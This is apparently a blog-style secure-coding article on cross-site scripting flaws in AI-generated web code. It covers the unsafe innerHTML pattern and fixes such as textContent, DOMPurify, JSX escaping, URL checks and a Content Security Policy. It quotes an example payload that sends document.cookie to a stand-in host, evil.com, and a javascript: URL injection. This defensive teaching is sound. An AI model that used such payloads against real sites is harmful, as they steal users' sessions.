The 86% XSS Failure Rate in AI-Generated Code
Veracode tested more than one hundred large language models against a standard set of web security benchmarks. Eighty-six percent failed on cross-site scripting (XSS) tests. Not edge cases — basic, well-documented attack patterns that any security-aware developer learns in their first year.
This is not a quirk of a specific model or version. It is a systematic pattern: AI models have absorbed millions of code examples that prioritize making things work over making things secure. The ratio of "code that renders user input" to "code that renders user input safely" in the training corpus heavily favors the unsafe version, simply because the safe version is less common in the wild.
Understanding why AI fails at XSS helps you know exactly where to look when reviewing AI-generated web code.
How XSS Works and Why AI Gets It Wrong
XSS is simple: an attacker injects malicious JavaScript into a page, which then executes in other users' browsers. It can steal session tokens, redirect users to phishing sites, or silently exfiltrate data.
The most common attack vector is user input that gets rendered into the DOM without sanitization. AI generates this constantly:
// AI writes this without hesitation
document.getElementById('comment').innerHTML = userComment;
// What an attacker submits as userComment:
// <img src=x onerror="fetch('https://evil.com/?c='+document.cookie)">
The fix is one line:
// Safe: text content, not HTML content
document.getElementById('comment').textContent = userComment;
But AI defaults to the unsafe pattern because it is more common in training data. It does not know the difference matters. You have to.
Input Sanitization
When you actually need to allow some HTML — rich text editors, comment formatting, markdown rendering — sanitization is essential. The standard library is DOMPurify:
import DOMPurify from 'dompurify';
// Safe: DOMPurify strips dangerous elements and attributes
const clean = DOMPurify.sanitize(userContent, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'ul', 'ol', 'li'],
ALLOWED_ATTR: ['href', 'title'],
ALLOW_DATA_ATTR: false,
});
document.getElementById('comment').innerHTML = clean;
Server-side rendering in React (Next.js) has a prop called dangerouslySetInnerHTML.
The name is a warning. Use DOMPurify before passing anything to it:
// Dangerous — do not do this with untrusted content
// <div dangerouslySetInnerHTML={{ __html: userContent }} />
// Safe — sanitize first
const safeHtml = DOMPurify.sanitize(userContent);
// <div dangerouslySetInnerHTML={{ __html: safeHtml }} />
Why React's JSX Is Safer (But Not Bulletproof)
React's JSX escapes text content by default. When you write <p>{userComment}</p>, React
converts it to a text node — angle brackets become < and >, so no HTML executes.
This is why React is generally safer than vanilla JS for rendering user content.
But JSX does not protect you from:
- The
dangerouslySetInnerHTMLprop (see above) - URL injection in
hrefattributes:<a href={userUrl}>whereuserUrlisjavascript:alert(1) - Template string injection if you bypass JSX to build HTML manually
The safe pattern for user-controlled URLs:
function SafeLink({ href, children }) {
// Only allow http and https protocols
const isSafe = href.startsWith('https://') || href.startsWith('http://');
return isSafe ? <a href={href}>{children}</a> : <span>{children}</span>;
}
Content Security Policy
CSP is a browser-enforced security layer that tells the browser which scripts, styles, and resources are allowed to load. A properly configured CSP can prevent XSS attacks even when your code has vulnerabilities — the malicious script simply will not execute because the browser refuses to run it.
AI-generated Next.js apps almost never include a CSP header. You have to add it manually.
In next.config.js:
const securityHeaders = [
{
key: 'Content-Security-Policy',
value: [
"default-src 'self'",
"script-src 'self' 'nonce-{NONCE}'", // use nonces for inline scripts
"style-src 'self' 'unsafe-inline'", // tighten once you audit inline styles
"img-src 'self' data: https:",
"font-src 'self'",
"connect-src 'self' https://api.yourdomain.com",
"frame-ancestors 'none'", // prevents clickjacking
].join('; '),
},
];
Start with a report-only policy (Content-Security-Policy-Report-Only) to identify violations
before enforcing. Add a report-uri to capture them.
Output Encoding: The Missing Last Step
Sanitization is about what goes in. Output encoding is about what comes out. When data moves between contexts — database to HTML, HTML to JavaScript, JavaScript to URL — the encoding must match the destination context.
AI-generated code regularly skips this. A practical checklist:
- HTML context: use
textContentor a templating system that auto-escapes - JavaScript context: use
JSON.stringify()before embedding data in script tags - URL context: use
encodeURIComponent()for query parameters - CSS context: never embed user data in CSS values (use CSS custom properties set via JS instead)
What to Do Next
- Search your codebase for
innerHTMLand audit every instance. Does it contain user input? If yes, switch totextContentor add DOMPurify sanitization. - Add a Content Security Policy to your Next.js or Express app. Start in report-only mode. It will immediately surface XSS vulnerabilities you did not know existed.
- Add a prompt constraint for AI-generated form code: "Never assign untrusted content to innerHTML. Always use textContent for user-controlled content. Always include input sanitization." This alone will significantly reduce the XSS surface area in AI-generated code.
The 86% failure rate is not destiny. It is a default you can override with supervision.
🤖 Ghostwritten by Claude Opus 4.6 · Curated by Tom Hundley